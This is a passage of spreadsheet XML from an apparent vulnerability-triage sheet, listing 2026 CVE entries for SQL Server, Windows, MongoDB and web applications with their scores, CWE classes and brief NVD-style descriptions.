          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K76" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019</t>
        </is>
      </c>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr"/>
      <c r="Q76" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77482</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77483</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K77" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr"/>
      <c r="Q77" s="5" t="inlineStr">
        <is>
          <t>CWE-1390</t>
        </is>
      </c>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>Weak authentication in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77483</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77484</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K78" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L78" s="5" t="inlineStr"/>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr"/>
      <c r="Q78" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77484</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77486</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K79" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019</t>
        </is>
      </c>
      <c r="L79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr"/>
      <c r="Q79" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77486</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77487</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K80" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L80" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr"/>
      <c r="Q80" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t>Improper access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77487</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77495</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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1" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr"/>
      <c r="Q81" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77495</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78456</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K82" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2022</t>
        </is>
      </c>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr"/>
      <c r="Q82" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78456</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80083</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K83" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr"/>
      <c r="Q83" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Hyper-V allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80083</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80096</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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4" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr"/>
      <c r="Q84" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Remote Desktop Services allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80096</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83992</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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5" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr"/>
      <c r="Q85" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83992</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83996</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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6" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr"/>
      <c r="Q86" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83996</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55250</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K87" s="5" t="inlineStr"/>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr"/>
      <c r="Q87" s="5" t="inlineStr">
        <is>
          <t>CWE-294, CWE-613, CWE-672</t>
        </is>
      </c>
      <c r="R87"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S87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55250</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75133</t>
        </is>
      </c>
      <c r="D88" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K88" s="5" t="inlineStr"/>
      <c r="L88" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr"/>
      <c r="Q88" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>Keep Backup Daily plugin for WordPress before 2.1.4 contains a sensitive information exposure vulnerability that allows unauthenticated attackers to trigger a full MySQL database dump by accessing the publicly exposed `kbd_cron_process` parameter without authentication. Attackers can predict the partially predictable dump filename based on the database name, a limited random range, and the current Unix timestamp to download the generated backup from the publicly accessible uploads directory.</t>
        </is>
      </c>
      <c r="S88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75133</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82064</t>
        </is>
      </c>
      <c r="D89" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E89" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F89" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K89" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr"/>
      <c r="Q89" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server allows an unauthenticated network user to cause a denial of service on a specific type of replica set member. The server contains an assertion in its read concern processing logic that can be reached without authentication, and the assertion's assumptions about internal state do not hold for all member configurations, causing the server process to terminate.</t>
        </is>
      </c>
      <c r="S89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82064</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82075</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K90" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr"/>
      <c r="Q90" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>An uncontrolled resource consumption weakness exists in the request-handling path of the MongoDB sharded-cluster router process. A client that has network access to a router port and has not authenticated can supply connection-monitoring parameters that cause the server to expend CPU resources without any rate limiting, degrading or denying service to legitimate clients. No authentication, elevated privileges, or user interaction is required. Only availability is affected; data confidentiality and integrity are not impacted.</t>
        </is>
      </c>
      <c r="S90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82075</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81525</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr">
        <is>
          <t>composer:mongodb/mongodb</t>
        </is>
      </c>
      <c r="M91" s="5" t="inlineStr">
        <is>
          <t>1.21.4, 2.4.1</t>
        </is>
      </c>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr"/>
      <c r="P91" s="5" t="inlineStr"/>
      <c r="Q91" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>### Impact
Passing untrusted input as part of a database or collection name may result in targeting a different database or collection than specified.
### Patches
Fixed in PHP library 1.21.4 and 2.4.1.
### Workarounds
Validate database and collection names prior to passing into APIs.</t>
        </is>
      </c>
      <c r="S91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81525</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85388</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr"/>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr"/>
      <c r="Q92" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>Worklenz through 3.0.0 fails to properly validate the sort-field query parameter in pagination helper functions, allowing authenticated users to inject arbitrary PostgreSQL expressions into ORDER BY clauses. Attackers can use time-based and boolean-based blind SQL injection techniques to extract sensitive database content including password hashes from other tenants. This is an incomplete fix for CVE-2026-25947.</t>
        </is>
      </c>
      <c r="S92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85388</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45221</t>
        </is>
      </c>
      <c r="D93" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr"/>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
